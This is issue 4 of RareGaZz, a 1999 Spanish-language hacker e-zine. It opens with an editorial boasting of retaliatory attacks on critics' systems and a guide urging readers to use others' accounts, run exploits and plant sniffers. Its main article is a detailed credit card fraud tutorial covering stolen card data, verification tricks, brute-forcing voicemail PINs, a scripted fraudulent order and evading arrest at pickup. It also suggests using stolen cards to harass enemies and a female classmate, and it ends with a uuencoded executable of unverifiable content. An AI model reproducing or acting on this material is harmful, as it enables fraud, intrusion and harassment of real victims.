RareGaZz4:(RARE004.TXT):12/12/1999 << Back To RareGaZz4

3l GrUp0 r3v0lUC10Nar10s d3l Ka0s pr3S3NTa <<::RareGaZz::>> "El Abogado del Diablo" Año 1, numero 4 -0- Comandantes -0- KillerBot - LePompeItor - Mr.X - RareTrip ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contenidos 1.- Introduccion -RareTrip- 2.- Como convertirse en un Hacker de Unix -LePompeItor- 3.- Vamonos de compras por la red (sin gastar un peso) -Mr.X- 4.- Como cubrir tus huellas Parte 1/2 -CrackSmoker- 5.- Poison Java -Mr. X- 6.- Algunos Bugs de SendMail -Psycho Tranze- 7.- Esteganografia, una vista a fondo. -KillerBot- 8.- El padre de todos los virus Parte 1 de 2 -internet- 9.- ¿Es Windows un Virus? -internet- 10.- Los vendedores y el anacoreta -colaboracion anonima- 11.- Phreaking para principiantes -sir francis drake- 12.- Editorial de Phrack -Reimpresion por RareGaZz- 13.- L3TZ HACK! -RdK- 14.- Ctrl + Alt + Del -RareGaZz- "Tu no sabrias que hacer con un passwd sin tokens..." Hector Lecuanda Yeah, right. RareGaZz es escrito con muchas ganas de informar y nadie se hace responsable de lo que la informacion/comentarios/sugerencias y todo lo contenido en los bytes de este E-Mag ocasionen a sistemas o individuos. Por favor tengan cuidado y *USEN* su cerebro antes de hacer lo que aqui se sugiere. En fin, no dejen que esto los detenga y adelante...¡iluminen su conocimiento! Si deseas contactar a las personas encargadas de esta revista escribe a: RAREGAZZ@BIGFOOT.COM RAREGAZZ@GEOCITIES.COM Los mensajes que envies pueden estar encriptados con la siguiente llave PGP -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzGPVwcAAAEEALETqAwBh9Esqcm7qrIFD0mtwe1l/bO6YcGmB33GwJQ5h97P AmA/QfBUU8Jo5kQI95444XkDdP4TVE5O6kiGE22lpxJ07R2bdB7qe9uCK51jOxzs ZS+7hm6GjPleeD/CqD7ktoc6bCYAkN5CxMARq6yb1B1bBE9QVz+6lY+Qf9UtAAUR tB9SYXJlR2FaeiA8UkFSRUdBWlpAQklHRk9PVC5DT00+ =Domc -----END PGP PUBLIC KEY BLOCK----- RareGaZz, una revista creada por Hackers para los Hackers. (WareZ D00dZ, CrackerZ, WannaBe'S, SysAdmins, & PsychoS Welcome) ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] * INTRODUCCION * ~~~~~~~~~~~~ RareGaZz, una revista dedicada a el esparcimiento de la cultura cibernetica especialmente la que se ha creado mediante la fusion de formas de pensar originalmente mexicanas y aquellas que han sido impuestas por internet, casi sin darnos cuenta. Nosotros tratamos de que no nos olvidemos de la importancia de permanecer unidos los mexicanos en esta red donde no se conocen fronteras y no existen las ideologias nacionalistas que ha ningun individuo sirven, son pues, para las masas. Cuando empezamos con la idea de la revista nunca nos imaginamos las respuestas tan negativas de las compañias comerciales e instituciones educativas de Mexico respecto a esta publicacion. En vez de ayudar a la revista para que se enfoque en ayudar a cualquier interesado en la informatica y tecnologia de redes, se han afanado en descubrir la identidad de nosotros los creadores para demandarnos y hacernos 'pagar' por los daños que segun ellos esta revista les ocasiona. Pues bien, con todo el respeto que se merecen todas las organizaciones que buscan sacarnos de la red, les enviamos el mas respetuoso ¡CHINGEN A SU MADRE! RareGaZz esta en internet ahora y lo estara SIEMPRE. Nuestras direcciones de correo se han visto virtualmente inundadas por correo con insultos y amenazas de distintos grupos mexicanos en i-net que desean la desaparicion de esta revista y por poco lo logran. No se como le hicieron pero me localizaron a mi (raretrip) y me destruyeron toda la informacion en mi computadora amenazandome con estupidas demandas y penas inexistentes. Pero en fin, cuando me encontraba ausente del lugar donde se encuentra mi Pc, entraron amenazando a todo mundo y formatearon mi disco duro. Gran error >:-} Despues de este incidente me puse a investigar si en realidad podrian tomarse acciones legales en mi contra o contra mis compañeros y encontre algo muy curioso en un libro llamado 'Constitucion de los Estados...blah' que se refiere a la "LIBERTAD DE CUALQUIER CIUDADANO PARA EXPRESAR SUS PUNTOS DE VISTA" y de ahi pienso agarrarme para defender la publicacion de esta revista y tal vez, proximamente, registrarla como publicacion oficial -Claro que seguira siendo gratuita-. La violencia genera violencia, ellos empezaron y por eso desde el tercer numero nos toca a nosotros. RareGaZz ahora forma parte permanente del grupo RdK que significa 'Revolucionarios del KaoS' que paso a formar el grupo Elite de Contra-Ataque a cualquier persona, grupo o institucion que intente por cualquier via terminar con esta revista. RareGaZz y el grupo RdK se comprometen a defender nuestras ideas usando todas las herramientas que nos pueda ofrecer la informatica que es, y sera, nuestra permanente aliada. Si las personas que nos han estado molestando (ellos saben quienes son) desean terminar este asunto como seres pensantes que -creo- son, estamos dispuestos a llegar a un acuerdo con ustedes. Ahora que, sigan molestando a los integrantes de nuestra lista de correo haciendose pasar por alguno de nosotros para luego formatearles sus pc's para culparnos, sigan bombardeando nuestras direcciones de correo, continuen amenazandonos, y sus sistemas seguiran pagando las consecuencias. Desde el numero anterior hemos empezado a atacar varios sistemas que nos han tratado de joder y solo terminaremos cuando todos lleguemos a un acuerdo, de lo contrario seguiremos en pie de guerra como hasta el momento. RareTrip - Editor <<::RareGaZz::>> "Por la Libertad de Informacion" raretrip killerbot lepompeitor Mr.X -= RdK =- "Preparados para la Guerra y el Terrorismo" ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] ################################################ # # # COMO CONVERTIRSE EN UN HACKER DE UNIX # # # ################################################ LePompeItor Asi que has decidido convertirte en un hacker del sistema unix pero no sabes como empezar? Antes de leer te deben quedar claras las siguientes cosas: 1) Ser hacker es mucho trabajo. No es una forma de jugar para niños que solo le dediquen 15 minutos. Debes aprender a operar y programar un sistema. Debes investigar como ejecutan el codigo fuente de los scripts. Es un largo camino asi que estas avisado. 2) Ser hacker es ilegal. Por lo menos en la mayoria de los paises existen leyes creadas para los hackers. Argentina e Irlanda no tienen leyes para perseguir un hacker. Confia en que si saben quien eres, vendran por ti. 3) Hackear consume tiempo. No puedes ser hacker la mitad de un año, despues hacer una pausa de 3 meses y regresar. El tiempo corre rapido en Internet. Nuevas versiones unix, nuevos bugs y nuevas curas. Cuando tu exploit pase de moda deberas rogar por conseguir la informacion mas nueva, y si eso pasa ellos nos estaran muy felices por eso. 50% del tiempo de un hacker se expende en recopilacion de informacion. Hablar con otros hackers, leer listas de correo y grupos de noticias, ver buenos sitios www y ftp. ¿Pero cual es la motivacion para ser BUEN hacker de unix? Eso depende de ti. Si quieres convertirte en uno piensa en POR QUE quieres ser hacker. Olvida peliculas como "The Net" o "Hackers" - Eso no es la realidad! Olvida sueños como ser el heroe, hackear computadoras de gobierno y convertirte en el hombre mas sexi, tener mujeres y terminar con un salario COOL y trabajando en la seguridad de los sistemas ;-) Esto no pasara - asi que asegurate bien del POR QUE quieres ser un hacker. -= COMO EMPEZAR =- -. Familiarisate ¿Como podrias ir a un rodeo sin saber manejar a un caballo? -. Consiguete una distribucion de unix Consigue Linux, FreeBSD, Solaris, Sinix etc. para tu computadora personal. Linux y FreeBSD son baratos (o gratuitos) y son derivadas deBSD, mientras que Solaris y Sinix son caros y derivados de Sys V. La distribucion linux que debes elegir es aquella con un buen libro de instrucciones. Debes aprender a operar unix. Primero aprende lo basico, como cambiar directorios, copiar y borrar, y usar el editor. -. Motivate a USAR unix. Como hacer eso - depende de ti. -. Busca libros para que te ayuden. -. Necesitaras una conexion a internet con PPP y/o acceso shell. Nunca hagas hacking o intercambies informacion no encriptada con PGP con esta cuenta tuya. Trata de configurar tu UNIX pc para usarla con tu cuenta. Algunas buenas distribuciones de Linux tienen un buen libro para explicar como hacer esto. -= Aprende lo Basico =- -. Trata de tener toda la informacion y archivos que puedas conseguir en internet (i-net). Examina www, ftp y usa maquinas de busqueda. Subscribete a importantes listas de seguridad. Asiste a buenos lugares irc. Aqui esta algo para empezar: http://underground.org ftp://onyx.infonexus.com nntp://comp.security.* Lista de correo Bugtrac -> email : listserv@netspace.org Cuerpo del mensaje : subscribe bugtraq nombre -. Lee y analiza tu informacion no solo la colecciones. -. Consigue una cuenta que no sea tuya - intenta obtenerla de algun hacker que hayas conocido. -. Con esta cuenta puedes intentar hackear tu primer sistema. Prueba tus exploits etc. -. Usa exploits ypx, sendmail, NFS inseguros, para tener mas hosts. -. Instala un sniffer si es posible en el sistema que hayas hackeado root. Esto te dara muchas cuentas en otros hosts. -. Usa tus scripts exploits. -= Conviertete en Hacker =- Que! - ya has hackeado root en algunos sistemas - y aun no eres un hacker - ¿POR QUE? Un hacker no es solo alguien que entra a un site, instala un sniffer y sigue. Un verdadero hacker es alguien que hackea para comprender un sistema, conocer como reacciona e inventar nuevas herramientas. He aqui un Colon del Cyberespacio. Consigue ponerte en contacto con otros hackers y cambia informacion, experiencias, cuentas, exploits y archivos. -. Ve las discusiones de los grupos de noticias, listas de correo e irc. Trata de leer algunos importantes RFCs, aprende C y comienza a programar herramientas propias. -. No te conviertas en "3l337" - Tu sabes que eres cool y no necesitas convencer a nadie de eso. Comportante normalmente y ayuda a otros que te pregunten "¿Como hackeo un Unix?" ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX \\\\\ ///// ///// //////////// /////\\\\ \\\\\ ///// ///// ///// ///// \\\\\ \\\\\ ///// ///// /////////// \\\\\\\\\\\\\\ \\\\\/// ///// ///// \\\\\\\\\\\\\\\\ \\\\\/ ///// //////////// ///// \\\\\ XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ¡VAMONOS DE COMPRAS POR LA RED! -sin gastar un peso...claro.- Para: RareGaZz Por: Mr. X "Me gusta, me lo llevo, carguelo a SU cuenta" [ Nota: El siguiente texto tiene fines EDUCATIVOS solamente y RareGaZz no se hace responsable por cualquier persona que intente hacer lo aqui descrito.] 1. Introduccion. ~~~~~~~~~~~~~~~~ Siempre que alguien quiere nuevo hardware o algun juguete y desea tenerlo gratis viene a mi y me pregunta: ¿Como obtengo cosas gratis de la red? En este texto voy a tratar de explicarle a las personas que tengan esa pregunta como hacerlo facilmente y eliminando el riesgo de caer atrapado por la ley. La finalidad de este articulo es llevarte paso a paso en el proceso de usar las tarjetas para hacer compras hasta el momento en que estes en casa leyendo el manual de tu nuevo juguete. 2. Obtener la informacion de las tarjetas ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Conseguir la informacion es el mas facil de los pasos para hacer esto. Simplemente podrias recoger algunas bolsas de basura en tu restaurante local, tienda de curiosidades o banco para encontrar los papeles carbon que se usan para pasar la info de las tarjetas a las diferentes hojitas cuando es pasada por la maquina registradora. No importa COMO obtengas la informacion, pero debes asegurarte de conseguir el nombre entero de la persona, su numero de tarjeta completo, la fecha de expiracion, y con suerte una direccion. En el caso de solo tener el nombre de la persona revisa en directorios o usando COMPUSERVE busca su direccion. Si tambien puedes conseguir el nombre del banco que creo la tarjeta ayudaria mucho. 3. Verificar la informacion de la tarjeta. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hay muchas formas de hacer esto. Y recuerda que mientras haces esto seria MUY util obtener su credito disponible. 1> Si sabes que banco saco la tarjeta, llama al banco y pregunta por el servicio de credito automatico. La mayoria los tienen. Este servicio fue creado para que los dueños de las tarjetas verifiquen su credito, balance, etc. Usualmente tienen ALGUN tipo de seguridad que previene a cualquier persona obtener esa informacion. Esta seguridad es inutil. Necesitarias saberte los ultimos 4 digitos de su registro social o su codigo postal. 2> Has una compra pequeña a cualquier direccion solo para verificar que aceptan la informacion de la tarjeta. 3> Usa un servicio pornografico que acepte tarjetas de credito. 4> Compila el programa incluido al final de este articulo UUENCODE que sirve unicamente para verificar si el numero de tarjeta es valido y saber de que tipo de tarjeta se trata. 4. Buscar la tienda o negocio a donde iras de compras. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Debes buscar una compañia relativamente pequeña - una que tenga lo que necesites en bodega pero no una que necesite empleados especiales para contestar llamadas. La mayoria de los lugares (Elektra, Radio Shack, etc.) te enviaran lo que pidas a cualquier direccion de la republica. Yo te recomiendo que uses un servicio de compras por Telefono que pueda entregarte tu pedido al dia siguiente a mas tardar. Tambien debes asegurarte que acepten el tipo de tarjeta con el que piensas pagar, para aquellos muy nuevos en esto aqui esta una breve descripcion: Si el primer digito de la tarjeta es: 3 American Express (15 digitos) 4 Visa (13 o 16 digitos) 5 Mastercard (16 digitos) 6 Discover (16 digitos) 5. Hacer la llamada. ~~~~~~~~~~~~~~~~~~~~ Antes de ir mas adelante, asegurense de tener un numero donde puedan verificar la orden. Puedes usar esos buzones de voz que ofrecen las compañias telefonicas pero obviamente alguno que hayas hackeado. Para hackear los buzones de voz necesitas un programa llamados VMS HACKER que permiten marcar un numero e intentar cualquier combinacion de digitos hasta descubrir la clave del buzon. Cuando hagas el pedido di que hablas de un negocio por que las tiendas siempre tratan mejor a un negocio que a un cliente estandard. Diles que necesitas los productos al siguiente dia, y si no pueden hacer esto, busca otra compañia. Cuando hagas la llamada relajate, pretende que estuvieras haciendo una orden para ti mismo, nada fuera de lo ordinario, pero tu necesitas empezar con este proyecto temprano. Asegurate que tengas toda la informacion a tu alcance. Llama durante horas de oficina y *NO* en viernes, sabado o domingo. Esta es una llamda ejemplo: Cia-"Hola XXXX, ¿este es mark puedo ayudarlo?" (Apunta su nombre) Hacker-"Si, mi nombre es Mr.X y estoy llamando del D.F., quisiera hacer un pedido." Cia-"Ok. Permitame ayudarlo, ¿Puedo saber su nombre? Hacker-"Mr.X" Cia-"Su direccion, Mr.X" Hacker-"Avenida XXXXX XXXXXXX, esta en XXXXXXX, el codigo postal es XXX" Cia-"Ok. me podria dar un numero para localizarlo en caso de problemas." Hacker-"XXX-XXX-XXX" Cia-"¿Que desea ordenar?" Hacker-"Necesito cuatro de esas impresoras laser jet, creo que ya hable con alguien el viernes acerca de esas, el numero de parte es XXXXXX-XX. Tambien, tengo una pregunta en esas impresoras, ¿que tipo de garantia tienen?" (¡Siempre pregunta por garantia!) Cia-"Bueno señor, esos modelos en particular tienen un año de garantia. Puede usted comprar una garantia adicional de 5 años por solo $XX adicionales por pieza. Tenemos una garantia incondicional de 90 dias." Hacker-"Tomare la garantia de 5 años en todas las impresoras." Cia-"¿Necesita algun cartucho de toner o papel?" Hacker-"No, todo lo que necesito son las impresoras." Cia-"¿Como desea que las envien?" Hacker-"Tienen servicio de paqueteria urgente ¿no? Cia-"Si." Hacker-"Entonces envienmelas para mañana." Cia-"¿Y como va a pagar su orden?" Hacker-"Con nuestra tarjeta corporativa Bancomer." Cia-"¿Puedo tener el numero de cuenta? Hacker-"seguro, es el XXXXX-XXXXX-XXXXXX" Cia-"¿El paquete debe llegar a la direccion de la tarjeta? - Aqui tienes dos opciones, decir que no y arriesgarte un poco dando otra direccion o luego llamar a el servicio de paqueteria para que cambien la ruta del paquete. Hacker1-"No, por favor haganmelas llevar a la Ave. XX.XXX-X-X-X-X" Hacker2-"Si asi es." Cia-"Entonces el paquete saldra hoy mismo y lo tendra usted mañana temprano." Hacker-"Gracias..." Quisiera mencionar algunas cosas. Primero, trata de determinar que tipo de autorizacion de tarjetas tienen. Si es una tienda, probablemente usen las terminales ZION, el tipo estandard o de barrido. Estas terminales no verifican la direccion o alguna otra cosa, solo se aseguran que la tarjeta sea valida y tenga el suficiente credito. El otro tipo de verificacion obtiene toda la informacion, incluyendo nombre y direccion. Es por eso que resulta importante que envies el pedido a la direccion de la tarjeta, ya que si cambias la direccion destino pueden llegar a sospechar. Trata de ser lo mas complaciente posible por que en el caso de que la tarjeta no pase la verificacion necesitaras otra que debes tener disponible. 6. Encontrar el lugar donde dejaran el producto. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Esto es una de las cosas mas dificiles de hacer.Deberas encontrar un edificio de departamentos cercano (no mucho) de donde vives. O busca una casa con el signo de 'SE VENDE' en el patio. Cualquiera de los casos, encuentra un lugar donde puedas esperar la camioneta con el pedido y estar atento. 7. Recoger el paquete. ~~~~~~~~~~~~~~~~~~~~~~ Esta es la parte mas PELIGROSA del asunto. Si vas a ser arrestado, aqui es donde pasara. NO hagas que alguien lo recoja por ti, dios sabe que inmediatamente te delatarian. Sin mencionar que eres probablemente mas brillante que la tipica planta casera, asi que quizas puedas con un buen choro [ verbo ] salir de la situacion. Algo asi funciona bien "Un tipo en la calle me dio este billete de $50 pesos por hacerlo, esta ahi...Que??? ¡hace rato estaba ahi en la esquina! ¿Donde habra ido? Llega al sitio donde recogeras el paquete muy temprano y camina por ahi, relajate, busca rutas de escape y tambien el camino que la panel seguira antes de llegar al lugar. Ponte atento si vez algo anormal. Cuando veas que el camion con el paquete va llegando, pretende como si estuvieras haciendo jardineria (si es una casa) o como si fueras saliendo o entrando del departamento. Firma el recibo y listo! Posibles Problemas ~~~~~~~~~~~~~~~~~~ Los unicos problemas que pueden ocasionar que el paquete no llegue son los siguientes: A> No hay suficiente credito B> Llamaron al dueño de la tarjeta para verificar el pedido. Recuerda no usar mas de 2 veces el mismo lugar para recoger el paquete, nunca usar una compañia mas de una vez y nunca usar la misma tarjeta 2 veces. Cuando tengas tu paquete MANTEN TU BOCA CERRADA. No brinques a IRC, y digas "Hey Cameron, acabo de comprar con tarjeta (carding) una Pentium." Y si lo haces no digas ESPECIFICACIONES, no deZ informacion acerca de la compañia, el sitio donde recogiste el paquete, el nombre en la tarjeta, NADA. -=KAOZ ALTERNATIVO=- ~~~~~~~~~~~~~~~~ En ocasiones tendras mucha informacion sobre distintas tarjetas pero no eres lo suficientemente valiente para comprar algo para ti asi que decides subscribir a magazines de gays/bisexuales/homosexuales a un enemigo tuyo. ¡Buena Idea! Tambien puedes ir a una tienda de articulos para el sexo y comprar un GRAN masturbador y enviarselo a una compañera de la escuela para ganar algunas risas :-) Recuerda, ¡NO DIGAS A NADIE QUE TU LO HICISTE! * Verificador de Tarjetas de Credito Validas * ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Copia el texto ENTRE los puntos a un archivo llamado CARD.UUE y ejecuta el siguiente comando: uudecode card.uue Necesitaras el programa uudecode incluido en el primer numero de RareGaZz ...............................Corta entre los puntos......................... begin 644 card.exe M35IS`0H````"`&H!:@+0`8`````.`!<!'````$Q:.3'__U6)Y3'`FD0"]0"* M1@0\`?\?=1JXR`!0FL8"DP"XD`'B^/>>]YKS^^F0`!\B/`)T`^F)Z/3H1[W? M%-;?__+_N%@"7?O@^!V\X/@>(`/@^`[N^`DL;?@+B>Q=CQ_"`@`X(/]4:&ES M(,/__6'VC4,@=71I;&ET__%Y('1O('9E<FEF]FAE__\@9F]L;&]W:6YG(&-A M<F1SZ2$Z-<=-87-TW4,>PN\L(%:_8?I!"/]MS=YN($5X<')E(8QS<^Y$Z&-O M*8VW(-D7RD5N_.'+N2!N=6UB]#H@F'@`___[__X#30_U___X#C3`0V]U;!<- MQ4Y/5&#X"4.U_"``@5WR-V[KX:F@.7!E+B_+3N`0X?U.ROQI9>)B:#@5"6]F M#&YK;@!G(DK0,IL2P\'2^`ST8?)A`:ML:?4:>-[\J?QO9<WX(E9)4T'-^`PS MS?@@HO0XJQO,_3;,^""2\`S)_B-7SO-YPH;Z(-QK92;R9/W@?V$.)_%R/R`H M62].*24A#_KI[FO;9F^K_\!U<Q3RIO/KZ`H<(%!R;V=RX^%A;6V),3$O_CDQ M_\,@8GD@1V]N6F\I0J5S&1YU<J!*;&P@;1:'YV)OX^O@>F^VP_]'86*<>F$A M'"@U,3,IOS`X.3`M,#8UMNE84#K\/^-!5$4J5T%9F@``]0#NX?N3`*+AQ@95 M]IK"T/X!\[`ZZ5E(Z;\^`!Y7[W"X%@!0L"#I,PK5OVP!^,/OO\$`#E<QP.[2 MF&H)PPK[#FKAY/SZ7=[D^!GQ^`FP!J#]S3`!S?@*HM,IS?@)A'__FIKHX3J< M"+#X%?'X#H`^R09V&?]_PYHQ`&X`,.0QTK](`9H<#,'CHAN@_>[X"^/A4+]0 M?IH2!?5T"/]AL`)0Z)3[ZP:P`?B,^WSKUCP`=1]8_'!8^`N3_^FWH34!/#'= M_J7=^!42W3*A#=WX'N^7,]W^U=WX%<S=T-TTW?X(`MWX%*G=-=W^AML[W?@5 MAMTV=1[=_&_=^!37]^MD/#?>_E+X%>M"/#C>^!X@/*MU.74<WO@;/?`=QORF M8/@+YN@-FD^TP?$H\`Q6X.@*H/,>\`S=;9I'0^D\3NK)&?T>[`E^Z`O*K5OX M\!3D_/#D^!G5^`\-`[GX&3?D^!0M5.?)+,G8>^'_$(_:__@+ZQUYU/]?T!A- MX;@T`^[#@>S^/_?$?@8&5XV^_OX65[C_1O@-=^BCB8;,_@"0O]2#YM`ZA.85 MYOW&AO$`[*0:Z.P?X`K`_.C]U/['/PZ\`0#K!/_XB[[#T?R*@^%0OQ&KR^0P MT3G0S/S*GIJ(P5W.[_WUU/]C-IJ-`P_JYWKX#(,>0-X4=:=SV^7]*>"%^`X_ MYKO@T-/#Z')L^##D2#US?(017B=MCIUAX?;B<Q61_MXM,$,H`-'@W\[?$>OX M#`$\[8W\"GP,BSX!]2T*`$#M]$2BG0/XE6YOJP%UJ.MJE/@<$ZGX$.OM^`V! M_#3\E/@E[9FYX/?YDHO0,-&X^"O"D.,*=>-U!C[T<_R+^*#_.^MU\"$)Z='^ MB$;_9<;8W?OJL?^QZ<H$X>@*Z"K3Y'<A#N@?`\KD+@9O[>T,&O'M.^HS[<?+ MM/__#^C3!3P'=`H\`W8&N`,`Z/#_5OVA`+0(,O_HNP6*Q/^')'^B:`"B7@`S MP*)9^!#^:?UJ+Z)8`+A``/$?CL"D)HH%)CH%=/N'__BY_\X_`K@W`)'WT!_^ M,]+W\:-DA@X?NB\!N#_^&R7-(1_#NLW")H`FA_$;`/Z1!CP$<@*/R;3^#Y)4 M!5@*Y'0MN!(1L__P\T<%N#`1MP"R]CT%@(<`^BIU%LX.SO#_O/VY``;H*06T M$K,@Z.,-(@7#21P%4-3^$?_PO;$`"M)U"+(8.7<"L3_\`8KRBM3^RJ.`_AAV M`H?_M`&C7!069@"(#EL`Q@'&!EJT,J-@[O^'8@##4!ZXFP&.V(`^+`,\`'0% MXR$!'UC/P%/Q^`!U`</P`!@`P<T64+3^__KK]+!>Z!@#L$/H$P/H"?_#`\TC MB]PVBT<$Z",&;CT>_Z#8\\H"`.N*5PJ&X?QW"/Q/!OQO!'_X.M%W)SKU=R-N M>!_^SA_^>!O^R3H.<G<3_LTZ+A`P9_@+=G(.P,-R#`/*"``4!F&(BCZVBP[K MBP?X7>@T!/GUZ"$#RSO]Z!8#X_[*BN49!,NX`>%/!^OJ`090Z/D"6''ZY8K( MBN[&.NYU`@?&,L#H],=M=2$>=P1]`K-R%SJ'P^!W$7,"-F'R"0/L.C9C\BV^ M`KCIZ!^&L0**PBH&V_[`CQ``I?3&]-T)_O2\%*CP=`0D#X<+#("`)I9P"`8/ M_S^5YB0'L032X.B/Z/T>EO3WRX`.^@C+XO3^[[N+5P0+TG03,_^.Q\KIBP$^ M'F3`F`8`2G7X"J?-L^E,XOG#V/__7P2XW32Z$@`[TW,:]_.+V/__Y&&H`W4( M#`/F8;"VYD.*PP>$YD**Q_S+YP&V)/SKESYI2_$(/\!1\K``=`*P`8OOQO@# M!NL*P'42,N3I'H;X"H@F[PKDFS#^L!$8_G`>-L5_!"%\QT7PU_L$@`"-A?CA M_(E%#(Q=#O$06?_Z`XQ-$L9%,``?Z/'5_;B1`\,?NV\$38%]`K'7=`H?0L:R MU[@^[]C*%'AXTA:)71CZ&HE-'#C=^AXSP,A5B^Q<T1_@)HM5!$I*^F`FQ.?_ M?0PSVV@.Z%S_N0$`//__"'0T/!-T,#P$=$1)/!MT)___/`%T(SP&=#<\&G1& M/`UT3___/"!RSSO:=,LFB`%#Z)@`.___WG;`B_/KO`O;=+BP".B'``?XL"#H M@OOV?0!+XL/'ZNNDX'2@)HH!RO\WF>AJ`$/B[^N1@#Y9(.F*_3^_ZPKH3@`F MQP$-"D-#0@!G6R9&:Z@!2`J[VHCQQ!Q"F%E-[BG\XQF@_5/$6JCQ"U/QZ!P` M1_\!XO?K`^B<`.C;_,;YX<_[L`WH`OL*4[TQ45)YZ7(`6"#A*BLM_C]$,SP* M=#6T"8H>7@`R_;T44NAE`5K^PH'J=B"*_P%UZ>L7M`[H40'K$^T^$/-T#?[* MZ]/IA/^;")LM``=:65O#_CYHQE_J=AC^SIX5Z>+@#!9X^+%9P[0#H^D,`;1X MPP+Y!0$>8MK8XE`?,0`?B]J+]T=O(2;<;RQS:SE'?OW#/#SH;[Z@_X\LZ&`8 MG:$'<L,`/L>MZQSH5`!M$VW#GP_H1]AX_^L'Z#\``GS31ZJFXJ;H,0#CAY3\ MB92*QO8F2AL/\/8#PHO(A+2P#NXPGNOKQ4+Z2K`/P@_TP?0?PSOW=&-_")E7 M'@:+SRO.M%N!Y^DV,KN*Q[\_XO\#P]'@B_A&NX/#_\(&N.*`/DD`!W4"M+#_ M_P8?CL#\"MMT%JR*V.RH`77Q__OZ^G3[B\.K^^+LZP;__HKGK*OB_`<?7^WQ M5E=5!LT/]A`'75]>,?_X"[H1V=J,_W\&,@`S[8O$!1,`L033Z(S2^`]+HPH` MHPP``P8$(?SY#OT8_1P`)J$"W_\`+0`0HR#$R0*^W0&Y$@"0___\+JRT-<TA MB1V,10*#QP3BUB'P'-+.3-D<T;K5^".%%/B=^"3XQMKP^#\$TKA[R5#^N`8" M'X8.4`[H.@7\I@7LQO\![/@*)NR7!<O[@\0&6/__@^<?@<>6`(#\.7,#O___ M5^'_M%2]B^R`3A8!6%M96O_H7E]='P?/N-``U0?9R._S`%E;ZP<&N3/),]LD M^___HRP`B\$+PW0?H1``"\!T$0_#CL`F.Q[U=`8P%#_\`.OMC,,K'@*#ZQ") M#O_'+@")'C``Q!XH`(S`S\(0$^G)]:,J_3:&,T<2`6@&4\M%%/9D3U#\]T8% M]/`-)1[18<45'O7R\:&P"P;XAK!T*;OO`7S!H7@P!.B7N_[T'O3X`^GH0`"P M.NA5]0Q/VN@UZ0,"Z`?#P]VT3,$NB@<*5P;_N.@X`$/K\\.Q9.:Q"O_QK>'K M!#+D]O$$,%"^6(K#T,3#4/SH`?90E]'#\.CH`_<D#^0\.G(__`($!XK0M`:X MPP`"&R/__R0T-38W.#DZ.SP]/C]U4G7_/FYT:6UE(&5R<HV)`"!A=-SA^RX- M"DCAAP8:RX/@\#[[%\G+H?GIM?[_'XOT-HY$`B8[50)_!WP4C@?X!7(/\P9\ M"/$X#/A%!'?8N,GQA]B-V"OP<@V![I$_AG('.S8T`'+GRN>__W3^_(O<C-J^ MV0@VQ7<$K*I_A8K(,NWSI([:W=GF_.H(PPKBAXM/XCHO.,%V`HK!W/@);(/= MB@4(<0K._^\,R@B*\?OV\<H&"\E_`[K9`_$K)_C!<A-`N.Y]`C/)\/`[LP:+ MP>OVP*J+7(;(L0B__W.J\#\-F*PF``5S"";&!?]\4(?VT`/Y1X-A^`DBT1G_ M3L%_U>,I1ZP\`>$?<BGMK/*N=1Q/ZQ_^^'^+T2O0<A%"GZ9T#@$/*\A[ODIU M\/]7C.L(*_B+QS8K1P0?B/^S_1C'C8HEF3K,$X]?S`K)=`82IG4".L1=_F^- M\/*P`:J^PJHTR4O^"J+]O]CQZS#]!K?*@>P``O__C;X`_Q97Q'X*!E>X`0!0 MBSL$1@9(:.G0_NX.[ACE]PC_W[2AWPI#_RVQZYGJL?[\[N3PW>P(]&_^BW?8 MY5W*#*S^@WZA?D.F^!"T&`BF=OZO^`KL`QIKCU"K_%RKF:O\[_P9UH>JAO`) M._U?!(K/"1]^,L#SJHK+-+$@*LLJSV#O]"S_]`2Y$&_I\^K_J^&ZX>KT\8K8 M,O^Q`]/KBO\KR(#A![`!TN`F"`&5O"_RX+_?VU<$*M!R'_["#]?5^!/0P(/3 M2\IU](7H$7+\26P#\72)Z`JL"+;X$81@\8M;M^@)5:TFKX\+!:OB^2CH"N3X M"O?0)B-EU^+WXO@5Y,;X%?.G2N@1D_T2J*_LL:_B6>KD_0]'@,&KN+#7_(`` MJ_7X./^-172KC.S3!L3A^<CMN0ZLJZS?RSQ/=@*P3YKD,L"J7^H5(`\*H^H% MP0?X!D9W^`SX^;E%#N^^10K_\.3QNK'7ZPBZLOL#NK/>X=?COD4"/06Y$CWI M=`UPOSU^=!#'M=EF`.LD4J<-?^HD`%J]50*Y_KNKH#OH2H'2FK/1NM5BL29, MLOVXM!CXL`CA`;5GX!A0NQ3*>JC]6.C1#+L<]0E-N0"WP?V;_B;_&271`^O? 